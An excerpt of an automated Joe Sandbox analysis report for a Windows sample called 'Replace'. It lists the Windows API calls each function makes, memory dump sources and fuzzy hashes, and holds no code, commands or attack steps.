                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: cf1435e2a1d495416b583d1f730df2263d8df0746ad804ac12c604d50612707e
                                                                                                                                                                                                              • Instruction ID: b5f974c8f7f96da14920e43ffe4ad66fa9673b0a54bdcd6d3458aeda01a34214
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf1435e2a1d495416b583d1f730df2263d8df0746ad804ac12c604d50612707e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A41BE319002258BCF14EBA5C8915FEB3F4EF14314B5448EAD862B7251EFB49D0287A5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB2407: ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00BB241D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BB6EDF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                                                                                              • Opcode ID: 956113a2bbaa2f49170f36f0125f84257340da110b991d59c3fe7b27bbfb3713
                                                                                                                                                                                                              • Instruction ID: 085384d3bc5fc81303983863318cf0ae223f32b40c6425e252e0719a622cde4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 956113a2bbaa2f49170f36f0125f84257340da110b991d59c3fe7b27bbfb3713
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7017C3660021AEBCB15CE14D840AFBB3F5FF45394B1041AAE806DB610DBB8ED11DBD0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,71499961,?,?,00000000,00BDA3BE,000000FF,?,00BC4F01,?,00000004,00000004,Function_0000660B,71499961), ref: 00BC4F4C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                              • Opcode ID: 3a34fcf668d4ba7df4163e14157c0039bcd596906da0e423db111d69c25b1e82
                                                                                                                                                                                                              • Instruction ID: 8d77fee11958bb2d8e1447b9d34a55c6fa180070141efb91de4c2e458fe6f934
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a34fcf668d4ba7df4163e14157c0039bcd596906da0e423db111d69c25b1e82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F0A733544954FBC7158F08CC51F55F7E8F745B20F11423AE556D36D0DB75A801CA94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00BC4FB0,?,?,?,?,00BC516F,00000001), ref: 00BC090D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 4cf2f37a303b158b1b4521b4f50ae214d8ed2e236048d149df9c03405d9b4f5d
                                                                                                                                                                                                              • Instruction ID: 8836a5a71398dd2c2583182c2dd0f6ff3c790b3dff6d21a21ea8777a72f226f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cf2f37a303b158b1b4521b4f50ae214d8ed2e236048d149df9c03405d9b4f5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EB012B03F6205BDFE6813244D3FF6A21449744B8BF10409CB301E90C4FBE068009018
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BC0957
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BCC9A2
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BCCA6E
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BCCA8E
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BCCA98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BCC07F,00BDB2C0), ref: 00BCBE87
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00BCC07F,?,00BCC07F,00BDB2C0), ref: 00BCBE90
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00BCC07F,00BDB2C0), ref: 00BCBE9B
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00BCC07F,00BDB2C0), ref: 00BCBEA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BD1A1A
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD1A24
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BD1A31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB45A0: WaitForSingleObject.KERNEL32(?,000000FF,00BC5E12,?,?,?,?,-00000086,000001E4), ref: 00BB45A3
                                                                                                                                                                                                                • Part of subcall function 00BB45A0: GetLastError.KERNEL32(?,?,?,?,-00000086,000001E4), ref: 00BB45AE
                                                                                                                                                                                                                • Part of subcall function 00BC3DA3: EnterCriticalSection.KERNEL32(000000B0,00000000,?,00000000,00000000,00000000,00000000,00BC3F31,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 00BC3DBA
                                                                                                                                                                                                                • Part of subcall function 00BC3DA3: LeaveCriticalSection.KERNEL32(?,?,?), ref: 00BC3E5E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000000B0,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00BC43A5
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000000B0), ref: 00BC43E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2116739831-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD8A38,?,?,00000008,?,?,00BD86D0,00000000), ref: 00BD8C6A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                              • Opcode ID: ed815a4a8463b310e3058bd46bd2d136134accede75e44835b6182db0e665f2c
                                                                                                                                                                                                              • Instruction ID: 37488911b7dd707bb267f74be8326a07aefe95b8d08dd0d9608bdecb1779b247
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed815a4a8463b310e3058bd46bd2d136134accede75e44835b6182db0e665f2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB17F71210608DFD715CF28C486B65BBE1FF05366F29869AE89ACF3A1D735E981CB40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732870572-0
                                                                                                                                                                                                              • Opcode ID: a1300af0e4da64ea7748f1ecc3bffc842d67cde7d8b6f76d00e2b2fe995aefbd
                                                                                                                                                                                                              • Instruction ID: 4988715e5505b93b805bccb5ea06809b352754464587723e05780ff74b44a90a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1300af0e4da64ea7748f1ecc3bffc842d67cde7d8b6f76d00e2b2fe995aefbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5712771624741DBDB28EE25C490B2BB7E6FB98314F448A6EF596C7740EB70E8408F52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001CB36,00BCC33A), ref: 00BCCB2F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 5500006653dd55f8810bc696a55b2248fd1c154b993903eda18225cd30497762
                                                                                                                                                                                                              • Instruction ID: edf17751572fb12c1e8cf92a0414af053f80827d7b3b6db29e54fc3c70aee6a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5500006653dd55f8810bc696a55b2248fd1c154b993903eda18225cd30497762
                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                              • Opcode ID: 53bacc2d8469d518e6abb2138d12e9f0ce77391ec377b088f1d26dcd3342e848
                                                                                                                                                                                                              • Instruction ID: c324d0a6bc7943474b80df8b30cc9f4c0e864b2f3114f846bf96864d1da76e4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53bacc2d8469d518e6abb2138d12e9f0ce77391ec377b088f1d26dcd3342e848
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA01270101100CB43108F315D4420976956D402C0701C0255001CA120EF2080505700
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ac1281bbeea65f2b6bb775c61bcae327fdb296be42dfe688bd3c3b4869dffded
                                                                                                                                                                                                              • Instruction ID: d429a0b887247a32e9576b83c2036508c3796a7e81c7c0d0428b1ee34c292385
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac1281bbeea65f2b6bb775c61bcae327fdb296be42dfe688bd3c3b4869dffded
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98323C71900249DFCB55DF28C881AFDBBE5FF48300F1985A9E8599B252DBB0EC91CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 4272536b496d5360d8d10fdf1da608a5ede8097c83ee5e6d56a9a01ab42c1ee3
                                                                                                                                                                                                              • Instruction ID: 3052627eacd027a159bd483021e95651542c59b0c6655dc3425634b67aae5545
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4272536b496d5360d8d10fdf1da608a5ede8097c83ee5e6d56a9a01ab42c1ee3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B50290327043158FD708CF2DC980A6ABBE2ABC8744F554ABDF496DB290D630DA46CB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 46a73b7ab401534dcad57af5bb67378b429419085b78b06654a418b9e52df2b8
                                                                                                                                                                                                              • Instruction ID: 4bd7d115fc509eec7c290d7593fe4ab8088248fdba65b59f7827c8859cb93ff1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46a73b7ab401534dcad57af5bb67378b429419085b78b06654a418b9e52df2b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5026574E002169FCB14DF68C5909FDB7F6FF49310B1081A9E91AAB312DBB1AC01CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7d1d98452d4e15de4c435841c218ce5782cfebf9cea2bbbd4bdeba8d300dfbe8
                                                                                                                                                                                                              • Instruction ID: 2be3dcf26cecbcf93ca8102b60f887db6348c23e0b99522a73f8469c699cceda
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d1d98452d4e15de4c435841c218ce5782cfebf9cea2bbbd4bdeba8d300dfbe8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 804135326142408BD718CE1CC9A47FE77D6E7C5320F954EBEE246A3554CAB48D84C792
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
